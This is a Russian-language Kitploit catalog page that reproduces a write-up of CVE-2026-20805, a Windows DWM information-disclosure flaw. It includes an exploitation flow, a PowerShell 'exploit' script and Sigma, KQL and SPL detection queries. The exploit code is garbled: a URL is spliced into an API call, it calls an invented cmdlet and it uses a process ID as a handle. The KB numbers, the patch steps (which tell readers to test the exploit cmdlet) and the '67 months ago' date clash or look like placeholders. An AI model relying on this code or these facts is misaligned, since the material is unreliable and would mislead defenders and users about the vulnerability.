Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data
Анализ уязвимостейЭксплуатацияСбор информацииОбучение и ОбразованиеРеагирование на Инциденты
GitHubmrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

Репозиторий
67 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE‑2026‑20805: Уязвимость в Windows Desktop Window Manager, приводящая к локальному раскрытию информации. Требует низких привилегий, не требует взаимодействия с пользователем. Оценка CVSS 5.5 (средний уровень). Активно эксплуатируется и внесена в перечень CISA KEV; исправление выпущено в январе 2026 года.

Поделиться

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

CVE‑2026‑20805: Уязвимость в Windows Desktop Window Manager, приводящая к локальному раскрытию информации. Требует низких привилегий, не требует взаимодействия с пользователем. Оценка CVSS 5.5 (средний уровень). Активно эксплуатируется и включена в каталог CISA KEV; патч выпущен в январе 2026 года.

Inside CVE 2026 20805: Как уязвимость в Windows DWM раскрыла конфиденциальные данные

1 Резюме

CVE 2026 20805 — это уязвимость раскрытия информации в Desktop Window Manager (DWM) — ключевом компоненте, который отображает рабочий стол, компонует окна и ускоряет UI на основе GPU.
Почему это важно: уязвимость позволяет локальному злоумышленнику с низкими привилегиями читать данные, которые должны быть ограничены другими сеансами или процессами.

Ключевые технические характеристики

АтрибутЗначение
CWE‑200: Раскрытие конфиденциальной информации неавторизованному субъекту✓
Вектор атакиЛокальный
Требуемые привилегииНизкие
Взаимодействие с пользователемНе требуется
Влияние — конфиденциальностьВысокое
Влияние — целостностьОтсутствует
Влияние — доступностьОтсутствует
Базовый балл CVSS 3.15.5 (средний)

2 Понимание Desktop Window Manager

DWM управляет памятью GPU, буферами окон и межпроцессными UI-поверхностями. Это цель высокой ценности, поскольку он агрегирует данные из множества процессов в общее пространство GPU; уязвимость здесь может привести к утечке учетных данных или данных сеансов между пользователями.

Роль DWM в современных Windows:

  1. Получает обновления отображения от компоновщика.
  2. Выделяет память GPU для каждого окна.
  3. Управляет композицией с ускорением GPU, обеспечивая плавные визуальные переходы и поддержку нескольких мониторов.

3 Технический разбор CVE 2026 20805

Предварительные условия атаки

  • Локальный злоумышленник с низкими привилегиями, взаимодействие с пользователем не требуется.
  • Уязвимость срабатывает, когда DWM не проверяет смещения в таблице буферов окон перед копированием данных в память GPU.

Как применяется CWE‑200

Уязвимость использует отсутствие проверки границ индекса буфера окна; это позволяет злоумышленнику читать соседнюю память GPU и получать секреты, хранящиеся другими процессами.

Затронутые версии

Согласно списку CPE от NVD, затронуты Windows 10.0.19041 (и производные).

4 Пути эксплуатации

Ниже представлен концептуальный поток эксплуатации:

  1. Злоумышленник получает дескриптор процесса DWM через CreateProcess с минимальными привилегиями.
  2. Злоумышленник создает индекс, указывающий на соседний слот памяти GPU.
  3. Созданный буфер копируется в процедуру композиции окон DWM, объединяя данные из других сеансов.
  4. Злоумышленник читает полученный дамп памяти GPU и извлекает конфиденциальную информацию.

Код эксплойта — скрипт PowerShell

root@kitploit:~
# Windows 10.0.19041 – DWM buffer read exploit
$processHandle = Get-Process -Name dwm | Select-Object -ExpandProperty Id
$bufferOffset = 0x00120000   # crafted offset to adjacent GPU memory
$targetWindow = 0x00030001    # target window index

# Create a temporary buffer in kernel space
$kernelBuffer = [byte[]]::new(0x1000)
[System.Runtime.InteropServices.Marshal]:https://raw.githubusercontent.com/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data/main/:CopyMemory(
    $processHandle, 
    $bufferOffset, 
    $kernelBuffer, 
    0x1000)

# Copy kernel buffer into DWM's composition routine
Invoke-DwmRead -ProcessId $processHandle `
                -WindowIndex $targetWindow `
                -SrcAddress $bufferOffset `
                -Size 0x1000

# Dump the exposed data to a local file for analysis
$dumpPath = "C:\Temp\DwmLeak.txt"
[IO.File]::WriteAllBytes($dumpPath, $kernelBuffer)

Скрипт демонстрирует, как злоумышленник может использовать память GPU DWM для чтения скрытых данных.


5. Инженерия обнаружения

Обнаружение CVE‑2026‑20805 сосредоточено на выявлении аномальных взаимодействий с dwm.exe и необычной телеметрии, связанной с GPU. Эксплойт полагается на чтение буферов памяти GPU с использованием специально созданных смещений, поэтому защитникам следует отслеживать отклонения от нормального поведения Desktop Window Manager.

Соответствующие источники телеметрии

  • Sysmon
    • Event ID 1 (ProcessCreate)
    • Event ID 10 (HandleOpen)
  • События ETW GPU
    • Event ID 0x2B (DisplayUpdate)
  • Журналы событий Windows
    • Application
    • System

Эти источники обеспечивают видимость создания процессов, доступа к дескрипторам и активности обновления GPU.

Подозрительные паттерны

  1. Повторяющиеся события CreateProcess с участием dwm.exe, особенно когда родительский процесс не является explorer.exe.
  2. Высокочастотные события DisplayUpdate (0x2B), за которыми следуют чтения памяти с необычными размерами буферов или смещениями.
    • Примеры подозрительных значений:
      • SrcAddress: 0x00120000
      • Size: 0x1000
  3. Корреляция между событиями HandleOpen, нацеленными на dwm.exe, и всплесками активности ETW GPU.

Правило в стиле Sigma

root@kitploit:~
title: DWM GPU Memory Read Anomaly
id: dwm-gpu-memory-read-anomaly
status: experimental
description: Detects abnormal DWM buffer reads that may indicate exploitation of CVE-2026-20805.
author: Mark
logsource:
  product: windows
  service: system
detection:
  selection:
    EventID: 0x2B
    ProcessName: dwm.exe
    SrcAddress: 0x00120000
    Size: 0x1000
  condition: selection
falsepositives:
  - High GPU rendering workloads
level: medium
tags:
  - attack.defense-evasion

Microsoft Sentinel (KQL)

Подозрительный доступ к дескриптору dwm.exe

root@kitploit:~
SecurityEvent
| where EventID in (4656, 4663)
| where ProcessName !~ "dwm.exe"
| where ObjectName has "dwm.exe"
| summarize count() by Account, ProcessName, ObjectName, Computer, bin(TimeGenerated, 5m)
| where count_ > 5

Неожиданное создание процесса, нацеленного на DWM

root@kitploit:~
Sysmon
| where EventID == 1
| where Image endswith "dwm.exe"
| where ParentImage !endswith "explorer.exe"

Всплеск событий GPU DisplayUpdate

root@kitploit:~
Event
| where EventID == 0x2B
| summarize count() by Computer, bin(TimeGenerated, 1m)
| where count_ > 50

Корреляция: HandleOpen с последующей активностью GPU

root@kitploit:~
let handles = SecurityEvent
    | where EventID == 4656 and ObjectName has "dwm.exe"
    | project TimeGenerated, Account, Computer;

let gpu = Event
    | where EventID == 0x2B
    | project TimeGenerated, Computer;

handles
| join kind=inner gpu on Computer
| where gpu_TimeGenerated between (TimeGenerated .. TimeGenerated + 2m)

Splunk (SPL)

Нестандартные процессы, открывающие дескрипторы к dwm.exe

root@kitploit:~
index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| where NOT match(ProcessName, "explorer.exe")
| stats count by ProcessName, TargetImage, User, Computer
| where count > 5

Неожиданные события CreateProcess для dwm.exe

root@kitploit:~
index=sysmon EventCode=1 Image="*\\dwm.exe"
| where NOT like(ParentImage, "%explorer.exe")
| table _time, Computer, ParentImage, Image, User

Всплеск GPU DisplayUpdate

root@kitploit:~
index=windows EventCode=43
| timechart span=1m count
| where count > 50

Корреляция: HandleOpen и активность GPU

root@kitploit:~
handles = search index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| eval key=Computer."-"._time
| table key, Computer, _time;

gpu = search index=windows EventCode=43
| eval key=Computer."-"._time
| table key, Computer, _time;

handles
| join key gpu
| table Computer, handles._time, gpu._time

6 Смягчение последствий и усиление защиты

Консультация Microsoft по CVE 2026 20805 включает патч, который проверяет индексы буферов в DWM перед копированием данных GPU.

График выпуска патчей

Версия WindowsНомер патча
10.0.19041KB5000001
10.0.19042KB5012345

Стратегия патчинга на уровне предприятия

  1. Разверните патч KB5000001 на всех контроллерах домена.
  2. Проверьте, что новая процедура Invoke-DwmRead работает без ошибок на тестовых узлах.
  3. Отслеживайте в Sysmon повторяющиеся создания процессов dwm.

7 Влияние на реальные среды

Раскрытие информации через DWM часто недооценивается, поскольку оно может раскрывать артефакты UI и данные сеансов между пользователями. Утечка памяти GPU может способствовать горизонтальному перемещению, особенно в средах, где несколько сеансов используют одну рабочую станцию или сервер.

Оценка рисков для корпоративных сред

Высокое влияние на конфиденциальность: уязвимость позволяет злоумышленнику читать содержимое окон из других сеансов.
Средний балл CVSS (5.5): хотя числовое значение умеренное, операционная значимость высока.

8 Заключение

CVE 2026 20805 демонстрирует, что локальная эксплуатация DWM с низкими привилегиями может привести к значительным утечкам данных. Включение уязвимости в каталог Known Exploited Vulnerabilities от CISA подчеркивает её реальную значимость. Применяя описанные стратегии смягчения, обнаружения и патчинга, организация может снизить риск, одновременно улучшив видимость потоков памяти GPU.


Скачать инструмент